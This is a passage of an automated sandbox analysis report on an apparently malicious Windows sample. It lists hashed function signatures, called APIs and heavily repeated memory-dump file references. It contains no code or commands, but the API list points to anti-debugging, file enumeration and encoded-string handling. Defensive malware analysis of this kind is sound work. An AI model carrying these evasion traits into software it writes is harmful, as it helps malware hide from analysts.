                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        • Opcode ID: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                        • Instruction ID: fde5f217f82ebe29c984b4a8bf476fe36905b452798d5d1b4171e59d2cf25e0a
                                                                                                                                                                        • Opcode Fuzzy Hash: 413ab2c401dedeffab42e718f703c10fdbd730e0357086002033bdee9966fac6
                                                                                                                                                                        • Instruction Fuzzy Hash: 1BE02232E453642BE214AB7CCC4896777DAAF85244B098628E840CB322FA21EE40C2C4
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0041CEDF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                        • Opcode ID: da7243875d0456b701c6f45826752656254760cf5c05d158f996038fb80d4f65
                                                                                                                                                                        • Instruction ID: 1c16a89c0c3b7ff22f86489a71ab4b19a9a082b058bc473a9a89e8bbe4bf86e0
                                                                                                                                                                        • Opcode Fuzzy Hash: da7243875d0456b701c6f45826752656254760cf5c05d158f996038fb80d4f65
                                                                                                                                                                        • Instruction Fuzzy Hash: 24F0A5B53013059FDB88CF68C4D1A1937A2FB89358F10446CEE05CB3A1E671E805CB14
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00433477
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                        • Opcode ID: 6b69d6eb76dfca04bb9c07650fd7679a3ae126db5c649b2a53e9010822c8e3ea
                                                                                                                                                                        • Instruction ID: d557d5ffb4daf8625b0560ab63d9c9146ed9a7a308abaca08e03d021c2add640
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b69d6eb76dfca04bb9c07650fd7679a3ae126db5c649b2a53e9010822c8e3ea
                                                                                                                                                                        • Instruction Fuzzy Hash: FDD0177430000A9FEB4CDB48C866B34B757AB88600F20412C9A1687684FA7569048B09
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                                                        • Opcode ID: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                        • Instruction ID: 0df1f5f79d30fcabe98c6cb3613603f4b5a0cecef6749fcbca2d7a1ce428ac3c
                                                                                                                                                                        • Opcode Fuzzy Hash: 686e4aad7f854b1a44dbe84834961a502191f8a2d24db8f6ecc6bb64ecf4b79e
                                                                                                                                                                        • Instruction Fuzzy Hash: 35D092317043158FC744CF59ECC4A8A77A6AF896163189568E009CB22ADA31ED92CA88
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 19ac461e9816622c4a4271341707a37060ee481cd88e1103d668710ed04c7f30
                                                                                                                                                                        • Instruction ID: 4c0722d13ccb888171deee9a4bfb133b8c74b6dc22ead532a3c802c332daa8fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 19ac461e9816622c4a4271341707a37060ee481cd88e1103d668710ed04c7f30
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DD05E39340118AFD314CF54EBD4C143366FF98B0032441A8D906073EBEE702C40CA2A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0042159B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 1974802433-1173974218
                                                                                                                                                                        • Opcode ID: 66cf4e571d804ee6e0b28a755787aa4ac6b1c9a70ff206e4b3eece8f915c2c00
                                                                                                                                                                        • Instruction ID: 12eed72317dc454678696c1a9da4bf9d2361ea3ee6819fa8f48d5a9846f5a7ce
                                                                                                                                                                        • Opcode Fuzzy Hash: 66cf4e571d804ee6e0b28a755787aa4ac6b1c9a70ff206e4b3eece8f915c2c00
                                                                                                                                                                        • Instruction Fuzzy Hash: 74216A7A601504AFC300EF9DDD94E9D77A5BF88710B040028E816D7369EAB0FE16CB99
                                                                                                                                                                        APIs
                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FC8A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BinaryCryptString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 80407269-0
                                                                                                                                                                        • Opcode ID: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                        • Instruction ID: 62de5bec956a169481a5778194fdf1df57051168b430666ee5781268b5f467f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 0418850739d7626781930600f170e8330271ee7d840b16371d054fb9262e1749
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F0B475108605BFD3009F26DC85DAB73ADEB88784B110029F9468B391EBB4BC008B65
                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 0040164E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationProcessQuery
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1778838933-0
                                                                                                                                                                        • Opcode ID: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                        • Instruction ID: 5146c5ff74eb99c3e513b584e61ba0d8331e3ddd70afdd09c52295fb5902dc9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 4a1399a23bb0bc12ba5ae64482b34f2c384e135c51c1a14a61ae8bc5af504664
                                                                                                                                                                        • Instruction Fuzzy Hash: E5E09AB1752321AFE320CF69CC85F233BAEEB89A20B008060BA00C7351D574EC0086A4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                        • Instruction ID: 089dadb44dc18b0797678ef5ba442c8809652ba94fb7cfa67b65c038052ec9a1
                                                                                                                                                                        • Opcode Fuzzy Hash: f5a5136bbc70b4a0018e084418bfce5d061723767273416e2e0291bd3ea70187
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DE012362163549FC614CF18D8D4E16B3A9EF8AA54B1B446CD50257742D620ED10CB64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
